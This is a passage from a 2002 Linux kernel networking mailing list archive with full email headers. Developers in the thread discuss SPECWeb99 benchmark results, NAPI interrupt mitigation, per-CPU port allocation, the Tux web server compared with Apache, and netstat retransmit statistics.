<3D78F55C.4020207@colorfullife.com> <20020906.113829.65591342.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 126 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: manfred@colorfullife.com Precedence: bulk X-list: netdev David S. Miller wrote: > From: Manfred Spraul > Date: Fri, 06 Sep 2002 20:35:08 +0200 > > The second point was that interrupt mitigation must remain enabled, even > with NAPI: the automatic mitigation doesn't work with process space > limited loads (e.g. TCP: backlog queue is drained quickly, but the > system is busy processing the prequeue or receive queue) > > Not true. NAPI is in fact a %100 replacement for hw interrupt > mitigation strategies. The cpu usage elimination afforded by > hw interrupt mitigation is also afforded by NAPI and even more > so by NAPI. > > See Jamal's paper. 
> I've read his paper: it's about MLFFR. There is no alternative to NAPI if packets arrive faster than they are processed by the backlog queue. But what if the backlog queue is empty all the time? Then NAPI thinks that the system is idle, and reenables the interrupts after each packet :-( In my tests, I've used a pentium class system (I have no GigE cards - that was the only system where I could saturate the cpu with 100MBit ethernet). IIRC 30% cpu time was needed for the copy_to_user(). The receive queue was filled, the backlog queue empty. With NAPI, I got 1 interrupt for each packet, with hw interrupt mitigation the throughput was 30% higher for MTU 600. Dave, do you have interrupt rates from the clients with and without NAPI? -- Manfred From davem@redhat.com Fri Sep 6 12:37:32 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:37:34 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JbWtG014490 for ; Fri, 6 Sep 2002 12:37:32 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id MAA15296; Fri, 6 Sep 2002 12:34:29 -0700 Date: Fri, 06 Sep 2002 12:34:28 -0700 (PDT) Message-Id: <20020906.123428.28085660.davem@redhat.com> To: manfred@colorfullife.com Cc: haveblue@us.ibm.com, hadi@cyberus.ca, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. 
Miller" In-Reply-To: <3D790499.8020501@colorfullife.com> References: <3D78F55C.4020207@colorfullife.com> <20020906.113829.65591342.davem@redhat.com> <3D790499.8020501@colorfullife.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 127 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Manfred Spraul Date: Fri, 06 Sep 2002 21:40:09 +0200 Dave, do you have interrupt rates from the clients with and without NAPI? Robert does. From niv@us.ibm.com Fri Sep 6 12:41:07 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:41:09 -0700 (PDT) Received: from e2.ny.us.ibm.com (e2.ny.us.ibm.com [32.97.182.102]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86Jf7tG014876 for ; Fri, 6 Sep 2002 12:41:07 -0700 Received: from northrelay03.pok.ibm.com (northrelay03.pok.ibm.com [9.56.224.151]) by e2.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86Jj8IV017734; Fri, 6 Sep 2002 15:45:08 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay03.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86Jj5UK095796; Fri, 6 Sep 2002 15:45:06 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id AE0213FE06; Fri, 6 Sep 2002 15:45:01 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id 21BD323C00D; Fri, 6 Sep 2002 15:45:01 -0400 (EDT) Received: from 9.47.18.15 ( [9.47.18.15]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Fri, 6 Sep 2002 12:45:00 -0700 Message-ID: <1031341500.3d7905bce1a63@imap.linux.ibm.com> Date: Fri, 6 Sep 2002 12:45:00 -0700 From: Nivedita Singhvi To: "David S. 
Miller" Cc: ak@suse.de, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <3D78E7A5.7050306@us.ibm.com> <20020906202646.A2185@wotan.suse.de> <1031339954.3d78ffb257d22@imap.linux.ibm.com> <20020906.122118.52140394.davem@redhat.com> In-Reply-To: <20020906.122118.52140394.davem@redhat.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.47.18.15 X-archive-position: 128 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Quoting "David S. Miller" : > There are methods to eliminate the centrality of the > port allocation locking. > > Basically, kill tcp_portalloc_lock and make the port rover be > per-cpu. Aha! Exactly what I started to do quite a while ago.. > The only tricky case is the "out of ports" situation. Because > there is no centralized locking being used to serialize port > allocation, it is difficult to be sure that the port space is truly > exhausted. I decided to use a stupid global flag to signal this.. It did become messy and I didn't finalize everything. Then my day job intervened :). Still hoping for spare time*5 to complete this if no one comes up with something before then.. > Another idea, which doesn't eliminate the tcp_portalloc_lock but > has other good SMP properties, is to apply a "cpu salt" to the > port rover value. For example, shift the local cpu number into > the upper parts of a 'u16', then 'xor' that with tcp_port_rover. nice..any patch extant?
:) thanks, Nivedita From Martin.Bligh@us.ibm.com Fri Sep 6 12:42:56 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:42:58 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JgttG015240 for ; Fri, 6 Sep 2002 12:42:55 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86Jl1EG156632; Fri, 6 Sep 2002 15:47:02 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86JkwWq051194; Fri, 6 Sep 2002 13:46:59 -0600 Date: Fri, 06 Sep 2002 12:45:39 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: Nivedita Singhvi , Andi Kleen cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <65179883.1031316338@[10.10.2.3]> In-Reply-To: <1031339954.3d78ffb257d22@imap.linux.ibm.com> References: <1031339954.3d78ffb257d22@imap.linux.ibm.com> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 129 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > There is some cacheline thrashing hurting the NUMA > more than other systems here too.. There is no NUMA here ... the clients are 4 single-node SMP systems. We're using the old quads to make them, but they're all split up, not linked together into one system. Sorry if we didn't make that clear. M.
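An aside on the port-allocation subthread above: the "cpu salt" idea is described only in words and no patch was posted, so what follows is a minimal user-space model in Python, not kernel code. The function names, the 3-bit CPU field, the 32768-61000 port range, and the modulo fold back into that range are all assumptions made for illustration; only the shift-and-xor step comes from the description in the thread.

```python
# Illustrative model of the "cpu salt" idea: shift the CPU number into the
# upper bits of a 16-bit value and XOR it with the shared port rover.
# PORT_LOW, PORT_HIGH and CPU_BITS are assumptions, not values from the thread.

PORT_LOW = 32768
PORT_HIGH = 61000
CPU_BITS = 3  # enough to tell 8 CPUs apart (assumed)


def cpu_salt(cpu: int, cpu_bits: int = CPU_BITS) -> int:
    """Place the CPU number in the top `cpu_bits` bits of a 16-bit value."""
    if not 0 <= cpu < (1 << cpu_bits):
        raise ValueError("cpu does not fit in cpu_bits")
    return (cpu << (16 - cpu_bits)) & 0xFFFF


def salted_rover(rover: int, cpu: int, cpu_bits: int = CPU_BITS) -> int:
    """XOR the salt into the rover, keeping the result within 16 bits."""
    return (rover ^ cpu_salt(cpu, cpu_bits)) & 0xFFFF


def first_candidate_port(rover: int, cpu: int) -> int:
    """Fold the salted value back into the local port range.

    The modulo fold is a hypothetical choice; the thread does not say how
    values outside the local port range would be handled.
    """
    span = PORT_HIGH - PORT_LOW + 1
    return PORT_LOW + salted_rover(rover, cpu) % span


if __name__ == "__main__":
    rover = 40000
    for cpu in range(4):
        print(cpu, salted_rover(rover, cpu), first_candidate_port(rover, cpu))
```

In this model, CPUs that read the same rover value start probing at different points in the port space, which is one way to picture the per-chain lock locality mentioned in the thread. The shared tcp_portalloc_lock would still be taken, as the original description says.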
From gerrit@us.ibm.com Fri Sep 6 12:48:49 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:48:50 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JmmtG015610 for ; Fri, 6 Sep 2002 12:48:49 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86JqsEG182492; Fri, 6 Sep 2002 15:52:55 -0400 Received: from w-gerrit2 (dyn9-47-17-91.beaverton.ibm.com [9.47.17.91]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86JqrWq087134; Fri, 6 Sep 2002 13:52:53 -0600 Received: from w-gerrit2 ([127.0.0.1] helo=us.ibm.com ident=gerrit) by w-gerrit2 with esmtp (Exim 3.35 #1 (Debian)) id 17nP9R-000453-00; Fri, 06 Sep 2002 12:52:21 -0700 To: "David S. Miller" cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Reply-To: Gerrit Huizenga From: Gerrit Huizenga Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-reply-to: Your message of Fri, 06 Sep 2002 11:58:04 PDT. <20020906.115804.109349169.davem@redhat.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <15685.1031341935.1@us.ibm.com> Date: Fri, 06 Sep 2002 12:52:15 -0700 Message-Id: X-archive-position: 130 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gh@us.ibm.com Precedence: bulk X-list: netdev In message <20020906.115804.109349169.davem@redhat.com>, > : "David S. Miller" writes: > From: Gerrit Huizenga > Date: Fri, 06 Sep 2002 11:57:39 -0700 > > Out of curiosity, and primarily for my own edification, what kind > of optimization does it do when everything is generated by a java/ > perl/python/homebrew script and pasted together by something which > consults a content manager. 
In a few of the cases that I know of, > there isn't really any static content to cache... And why is this > something that Apache couldn't/shouldn't be doing? > > The kernel exec's the CGI process from the TUX server and pipes the > output directly into a networking socket. > > Because it is cheaper to create a new fresh user thread from within > the kernel (ie. we don't have to fork() apache and thus dup it's > address space), it is faster. So if apache were using a listen()/clone()/accept()/exec() combo rather than a full listen()/fork()/exec() model it would see most of the same benefits? Some additional overhead for the user/kernel syscall path but probably pretty minor, right? Or did I miss a piece of data, like the time to call clone() as a function from in kernel is 2x or 10x more than the same syscall? gerrit From davem@redhat.com Fri Sep 6 12:52:40 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:52:42 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JqetG015991 for ; Fri, 6 Sep 2002 12:52:40 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id MAA15408; Fri, 6 Sep 2002 12:49:36 -0700 Date: Fri, 06 Sep 2002 12:49:36 -0700 (PDT) Message-Id: <20020906.124936.34476547.davem@redhat.com> To: gh@us.ibm.com Cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. 
Miller" In-Reply-To: References: <20020906.115804.109349169.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 131 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Gerrit Huizenga Date: Fri, 06 Sep 2002 12:52:15 -0700 So if apache were using a listen()/clone()/accept()/exec() combo rather than a full listen()/fork()/exec() model it would see most of the same benefits? Apache would need to do some more, such as do something about cpu affinity and do the non-blocking VFS tricks Tux does too. To be honest, I'm not going to sit here all day long and explain how Tux works. I'm not even too knowledgeable about the precise details of its implementation. Besides, the code is freely available and not too complex, so you can go have a look for yourself :-) From gerrit@us.ibm.com Fri Sep 6 13:00:18 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 13:00:21 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86K0HtG016435 for ; Fri, 6 Sep 2002 13:00:18 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86K4NEG037384; Fri, 6 Sep 2002 16:04:24 -0400 Received: from w-gerrit2 (dyn9-47-17-91.beaverton.ibm.com [9.47.17.91]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86K4MWq215762; Fri, 6 Sep 2002 14:04:23 -0600 Received: from w-gerrit2 ([127.0.0.1] helo=us.ibm.com ident=gerrit) by w-gerrit2 with esmtp (Exim 3.35 #1 (Debian)) id 17nPKV-00046g-00; Fri, 06 Sep 2002 13:03:47 -0700 To: "David S.
Miller" cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Reply-To: Gerrit Huizenga From: Gerrit Huizenga Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-reply-to: Your message of Fri, 06 Sep 2002 12:49:36 PDT. <20020906.124936.34476547.davem@redhat.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <15786.1031342622.1@us.ibm.com> Date: Fri, 06 Sep 2002 13:03:42 -0700 Message-Id: X-archive-position: 132 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gh@us.ibm.com Precedence: bulk X-list: netdev In message <20020906.124936.34476547.davem@redhat.com>, > : "David S. Miller" writes: > From: Gerrit Huizenga > Date: Fri, 06 Sep 2002 12:52:15 -0700 > > So if apache were using a listen()/clone()/accept()/exec() combo rather than a > full listen()/fork()/exec() model it would see most of the same benefits? > > Apache would need to do some more, such as do something about > cpu affinity and do the non-blocking VFS tricks Tux does too. > > To be honest, I'm not going to sit here all day long and explain how > Tux works. I'm not even too knowledgeable about the precise details of > its implementation. Besides, the code is freely available and not > too complex, so you can go have a look for yourself :-) Aw, and you are such a good tutor, too. :-) But thanks - my particular goal isn't to fix apache since there is already a group of folks working on that, but as we look at kernel traces, this should give us a good idea if we are at the bottleneck of the apache architecture or if we have other kernel bottlenecks. At the moment, the latter seems to be true, and I think we have some good data from Troy and Dave to validate that.
I think we have already seen the affinity problem or at least talked about it as that was somewhat visible and Apache 2.0 does seem to have some solutions for helping with that. And when the kernel does the best it can with Apache's architecture, we have more data to convince them to fix the architecture problems. thanks again! gerrit
From alan@lxorguk.ukuu.org.uk Fri Sep 6 13:23:58 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 13:24:03 -0700 (PDT) Received: from irongate.swansea.linux.org.uk (pc1-cwma1-5-cust128.swa.cable.ntl.com [80.5.120.128]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86KNutG017499 for ; Fri, 6 Sep 2002 13:23:57 -0700 Received: from irongate.swansea.linux.org.uk (localhost [127.0.0.1]) by irongate.swansea.linux.org.uk (8.12.5/8.12.5) with ESMTP id g86KTS30011603; Fri, 6 Sep 2002 21:29:28 +0100 Received: (from alan@localhost) by irongate.swansea.linux.org.uk (8.12.5/8.12.5/Submit) id g86KTPXH011601; Fri, 6 Sep 2002 21:29:25 +0100 X-Authentication-Warning: irongate.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: Alan Cox To: "Martin J. Bligh" Cc: "David S. Miller" , gh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com In-Reply-To: <61930391.1031313088@[10.10.2.3]> References: <20020906.113611.102227888.davem@redhat.com> <61930391.1031313088@[10.10.2.3]> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 (1.0.8-6) Date: 06 Sep 2002 21:29:25 +0100 Message-Id: <1031344165.10612.79.camel@irongate.swansea.linux.org.uk> Mime-Version: 1.0 X-archive-position: 134 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Fri, 2002-09-06 at 19:51, Martin J. Bligh wrote: > The secondary point is "what are customers doing in the field?" > (not what *should* they be doing ;-)). Moreover, I think the > Apache + Tux combination has been fairly well beaten on already > by other people in the past, though I'm sure it could be done > again. Tux has been proven in the field.
A glance at some of the interesting porn domain names using it would
show that 8)

From tcw@tempest.prismnet.com Fri Sep 6 16:44:30 2002
Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 16:44:36 -0700 (PDT)
Received: from tempest.prismnet.com (root@tempest.prismnet.com [209.198.128.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86NiUtG021219 for ; Fri, 6 Sep 2002 16:44:30 -0700
Received: from tempest.prismnet.com (tcw@localhost [127.0.0.1]) by tempest.prismnet.com (8.12.5/8.12.5) with ESMTP id g86Nmewf016826; Fri, 6 Sep 2002 18:48:41 -0500 (CDT) (envelope-from tcw@tempest.prismnet.com)
Received: (from tcw@localhost) by tempest.prismnet.com (8.12.5/8.12.5/Submit) id g86NmdId016825; Fri, 6 Sep 2002 18:48:39 -0500 (CDT)
From: Troy Wilson
Message-Id: <200209062348.g86NmdId016825@tempest.prismnet.com>
Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000
In-Reply-To: <18563262.1031269721@[10.10.2.3]> "from Martin J. Bligh at Sep 5, 2002 11:48:42 pm"
To: "Martin J. Bligh"
Date: Fri, 6 Sep 2002 18:48:39 -0500 (CDT)
CC: "David S. Miller" , hadi@cyberus.ca, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
X-archive-position: 135
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: tcw@tempest.prismnet.com
Precedence: bulk
X-list: netdev

> > It's the DMA bandwidth saved, most of the specweb runs on x86 hardware
> > is limited by the DMA throughput of the PCI host controller. In
> > particular some controllers are limited to smaller DMA bursts to
> > work around hardware bugs.
>
> I'm not sure that's entirely true in this case - the Netfinity
> 8500R is slightly unusual in that it has 3 or 4 PCI buses, and
> there's 4 - 8 gigabit ethernet cards in this beast spread around
> different buses (Troy - are we still just using 4?

My machine is not exactly an 8500r. It's an Intel pre-release
engineering sample (8-way 900MHz PIII) box that is similar to an
8500r... there are some differences when going across the coherency
filter (the bus that ties the two 4-way "halves" of the machine
together). Bill Hartner has a test program that illustrates the
differences-- but more on that later.

I've got 4 PCI busses, two 33 MHz, and two 66MHz, all 64-bit.
I'm configured as follows:

  PCI Bus 0    eth1 --- 3 clients
   33 MHz      eth2 --- Not in use

  PCI Bus 1    eth3 --- 2 clients
   33 MHz      eth4 --- Not in use

  PCI Bus 3    eth5 --- 6 clients
   66 MHz      eth6 --- Not in use

  PCI Bus 4    eth7 --- 6 clients
   66 MHz      eth8 --- Not in use

> ... and what's
> the raw bandwidth of data we're pushing? ... it's not huge).

2900 simultaneous connections, each at ~320 kbps translates to
928000 kbps, which is slightly less than the full bandwidth of a
single e1000. We're spreading that over 4 adapters, and 4 busses.

- Troy

From tcw@tempest.prismnet.com Fri Sep 6 16:51:53 2002
Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 16:51:55 -0700 (PDT)
Received: from tempest.prismnet.com (root@tempest.prismnet.com [209.198.128.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86NprtG021616 for ; Fri, 6 Sep 2002 16:51:53 -0700
Received: from tempest.prismnet.com (tcw@localhost [127.0.0.1]) by tempest.prismnet.com (8.12.5/8.12.5) with ESMTP id g86Nu5wf016945; Fri, 6 Sep 2002 18:56:05 -0500 (CDT) (envelope-from tcw@tempest.prismnet.com)
Received: (from tcw@localhost) by tempest.prismnet.com (8.12.5/8.12.5/Submit) id g86Nu4Gk016944; Fri, 6 Sep 2002 18:56:04 -0500 (CDT)
From: Troy Wilson
Message-Id: <200209062356.g86Nu4Gk016944@tempest.prismnet.com>
Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000
In-Reply-To: "from jamal at Sep 5, 2002 04:59:47 pm"
To: jamal
Date: Fri, 6 Sep 2002 18:56:04 -0500 (CDT)
CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
X-archive-position: 136
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: tcw@tempest.prismnet.com
Precedence: bulk
X-list: netdev

> Do you have any stats from the hardware that could show
> retransmits etc;

**********************************
* netstat -s before the workload *
**********************************

Ip:
    433 total packets received
    0 forwarded
    0 incoming packets discarded
    409 incoming packets delivered
    239 requests sent out
Icmp:
    24 ICMP messages received
    0 input ICMP message failed.
    ICMP input histogram:
        destination unreachable: 24
    24 ICMP messages sent
    0 ICMP messages failed
    ICMP output histogram:
        destination unreachable: 24
Tcp:
    0 active connections openings
    2 passive connection openings
    0 failed connection attempts
    0 connection resets received
    2 connections established
    300 segments received
    183 segments send out
    0 segments retransmited
    0 bad segments received.
    2 resets sent
Udp:
    8 packets received
    24 packets to unknown port received.
    0 packet receive errors
    32 packets sent
TcpExt:
    ArpFilter: 0
    5 delayed acks sent
    4 packets directly queued to recvmsg prequeue.
    35 packets header predicted
    TCPPureAcks: 5
    TCPHPAcks: 160
    TCPRenoRecovery: 0
    TCPSackRecovery: 0
    TCPSACKReneging: 0
    TCPFACKReorder: 0
    TCPSACKReorder: 0
    TCPRenoReorder: 0
    TCPTSReorder: 0
    TCPFullUndo: 0
    TCPPartialUndo: 0
    TCPDSACKUndo: 0
    TCPLossUndo: 0
    TCPLoss: 0
    TCPLostRetransmit: 0
    TCPRenoFailures: 0
    TCPSackFailures: 0
    TCPLossFailures: 0
    TCPFastRetrans: 0
    TCPForwardRetrans: 0
    TCPSlowStartRetrans: 0
    TCPTimeouts: 0
    TCPRenoRecoveryFail: 0
    TCPSackRecoveryFail: 0
    TCPSchedulerFailed: 0
    TCPRcvCollapsed: 0
    TCPDSACKOldSent: 0
    TCPDSACKOfoSent: 0
    TCPDSACKRecv: 0
    TCPDSACKOfoRecv: 0
    TCPAbortOnSyn: 0
    TCPAbortOnData: 0
    TCPAbortOnClose: 0
    TCPAbortOnMemory: 0
    TCPAbortOnTimeout: 0
    TCPAbortOnLinger: 0
    TCPAbortFailed: 0
    TCPMemoryPressures: 0

*********************************
* netstat -s after the workload *
*********************************

Ip:
    425317106 total packets received
    3648 forwarded
    0 incoming packets discarded
    425313332 incoming packets delivered
    203629600 requests sent out
Icmp:
    58 ICMP messages received
    12 input ICMP message failed.
    ICMP input histogram:
        destination unreachable: 58
    58 ICMP messages sent
    0 ICMP messages failed
    ICMP output histogram:
        destination unreachable: 58
Tcp:
    64 active connections openings
    16690445 passive connection openings
    56552 failed connection attempts
    0 connection resets received
    3 connections established
    425311551 segments received
    203629500 segments send out
    4241408 segments retransmited
    0 bad segments received.
    298883 resets sent
Udp:
    8 packets received
    34 packets to unknown port received.
    0 packet receive errors
    42 packets sent
TcpExt:
    ArpFilter: 0
    8884840 TCP sockets finished time wait in fast timer
    12913162 delayed acks sent
    17292 delayed acks further delayed because of locked socket
    Quick ack mode was activated 102351 times
    54977 times the listen queue of a socket overflowed
    54977 SYNs to LISTEN sockets ignored
    157 packets directly queued to recvmsg prequeue.
    51 packets directly received from prequeue
    16925947 packets header predicted
    51 packets header predicted and directly queued to user
    TCPPureAcks: 169071816
    TCPHPAcks: 176510836
    TCPRenoRecovery: 30090
    TCPSackRecovery: 0
    TCPSACKReneging: 0
    TCPFACKReorder: 0
    TCPSACKReorder: 0
    TCPRenoReorder: 464
    TCPTSReorder: 5
    TCPFullUndo: 6
    TCPPartialUndo: 29
    TCPDSACKUndo: 0
    TCPLossUndo: 1
    TCPLoss: 0
    TCPLostRetransmit: 0
    TCPRenoFailures: 218884
    TCPSackFailures: 0
    TCPLossFailures: 35561
    TCPFastRetrans: 145529
    TCPForwardRetrans: 0
    TCPSlowStartRetrans: 3463096
    TCPTimeouts: 373473
    TCPRenoRecoveryFail: 1221
    TCPSackRecoveryFail: 0
    TCPSchedulerFailed: 0
    TCPRcvCollapsed: 0
    TCPDSACKOldSent: 0
    TCPDSACKOfoSent: 0
    TCPDSACKRecv: 1
    TCPDSACKOfoRecv: 0
    TCPAbortOnSyn: 0
    TCPAbortOnData: 0
    TCPAbortOnClose: 0
    TCPAbortOnMemory: 0
    TCPAbortOnTimeout: 0
    TCPAbortOnLinger: 0
    TCPAbortFailed: 0
    TCPMemoryPressures: 0

From davem@redhat.com Fri Sep 6 16:55:48 2002
Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 16:55:50 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86NtltG022015 for ; Fri, 6 Sep 2002 16:55:48 -0700
Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id QAA16501; Fri, 6 Sep 2002 16:52:44 -0700
Date: Fri, 06 Sep 2002 16:52:44 -0700 (PDT)
Message-Id: <20020906.165244.03972708.davem@redhat.com>
To: tcw@tempest.prismnet.com
Cc: hadi@cyberus.ca, linux-kernel@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000
From: "David S. Miller"
In-Reply-To: <200209062356.g86Nu4Gk016944@tempest.prismnet.com>
References: <200209062356.g86Nu4Gk016944@tempest.prismnet.com>
X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 137
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

   From: Troy Wilson
   Date: Fri, 6 Sep 2002 18:56:04 -0500 (CDT)

       4241408 segments retransmited

Is hw flow control being negotiated and enabled properly on the
gigabit interfaces?

There should be no reason for these kinds of retransmits to happen.

From tcw@tempest.prismnet.com Fri Sep 6 17:01:18 2002
Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 17:01:21 -0700 (PDT)
Received: from tempest.prismnet.com (root@tempest.prismnet.com [209.198.128.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8701ItG022437 for ; Fri, 6 Sep 2002 17:01:18 -0700
Received: from tempest.prismnet.com (tcw@localhost [127.0.0.1]) by tempest.prismnet.com (8.12.5/8.12.5) with ESMTP id g8705Twf017051; Fri, 6 Sep 2002 19:05:30 -0500 (CDT) (envelope-from tcw@tempest.prismnet.com)
